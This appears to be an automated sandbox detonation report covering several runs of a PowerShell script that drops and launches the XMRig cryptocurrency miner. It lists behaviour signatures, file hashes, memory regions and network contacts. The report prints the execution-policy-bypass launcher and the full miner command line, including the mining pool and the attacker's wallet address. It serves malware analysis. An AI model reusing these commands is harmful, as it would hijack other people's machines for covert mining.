N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1380-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vx3c345f.21k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1380-9-0x000001AE38DF0000-0x000001AE38E12000-memory.dmp

memory/1380-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-14-0x000001AE38DC0000-0x000001AE38DD2000-memory.dmp

memory/1380-15-0x000001AE20A60000-0x000001AE20A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3808-46-0x0000021212140000-0x0000021212160000-memory.dmp

memory/3808-47-0x0000021212190000-0x00000212121B0000-memory.dmp

memory/3808-48-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-49-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/1380-50-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp

memory/1380-51-0x00007FFD77043000-0x00007FFD77045000-memory.dmp

memory/3808-52-0x00000212121B0000-0x00000212121D0000-memory.dmp

memory/3808-53-0x00000212121D0000-0x00000212121F0000-memory.dmp

memory/3808-54-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-55-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-56-0x00000212121B0000-0x00000212121D0000-memory.dmp

memory/3808-57-0x00000212121D0000-0x00000212121F0000-memory.dmp

memory/3808-58-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-59-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-60-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-61-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-62-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-63-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-64-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-65-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-66-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-67-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-68-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-69-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-70-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-71-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-72-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-73-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-74-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-75-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-76-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-77-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-78-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-79-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-80-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-81-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-82-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-83-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-84-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-85-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-86-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-87-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-88-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-89-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-90-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-91-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-92-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-93-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-94-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-95-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-96-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-97-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-98-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-99-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-100-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-101-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-102-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-103-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-104-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-105-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-106-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-107-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-108-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-109-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-110-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-111-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-112-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-113-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-114-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-115-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-116-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:02

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3508-4-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x00000176F4B20000-0x00000176F4B42000-memory.dmp

memory/3508-9-0x00000176F4BD0000-0x00000176F4C46000-memory.dmp

memory/3508-8-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-10-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwxumpzt.4q1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x00000176F4D50000-0x00000176F4D62000-memory.dmp

memory/3508-61-0x00000176F4BB0000-0x00000176F4BBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4348-90-0x00000152C06A0000-0x00000152C06C0000-memory.dmp

memory/3508-92-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-93-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/4348-91-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-94-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-95-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-96-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-97-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-98-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-99-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-100-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-101-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-102-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-103-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-104-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-105-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-106-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-107-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-108-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-109-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-110-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-111-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-112-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-113-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-114-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-115-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-116-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-117-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-118-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-119-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-120-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-121-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-122-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-123-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-124-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-125-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-126-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-127-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-128-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-129-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-130-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-131-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-132-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-133-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-134-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-135-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-136-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-137-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-138-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-139-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-140-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-141-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-142-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-143-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-144-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-145-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-146-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-147-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-148-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-149-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-150-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-151-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-152-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-153-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-154-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-155-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1212-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rb1tnmk3.eb1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1212-9-0x000002041BF70000-0x000002041BF92000-memory.dmp

memory/1212-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-15-0x000002041C460000-0x000002041C46A000-memory.dmp

memory/1212-14-0x000002041C480000-0x000002041C492000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3824-46-0x000001D18DC30000-0x000001D18DC50000-memory.dmp

memory/3824-47-0x000001D18DE80000-0x000001D18DEA0000-memory.dmp

memory/3824-48-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/1212-50-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

memory/3824-49-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-53-0x000001D18DEC0000-0x000001D18DEE0000-memory.dmp

memory/3824-52-0x000001D18DEA0000-0x000001D18DEC0000-memory.dmp

memory/1212-51-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-54-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/3824-55-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-56-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-57-0x000001D18DEA0000-0x000001D18DEC0000-memory.dmp

memory/3824-58-0x000001D18DEC0000-0x000001D18DEE0000-memory.dmp

memory/3824-59-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-60-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-61-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-62-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-63-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-64-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-65-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-66-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-67-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-68-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-69-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-70-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-71-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-72-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-73-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-74-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

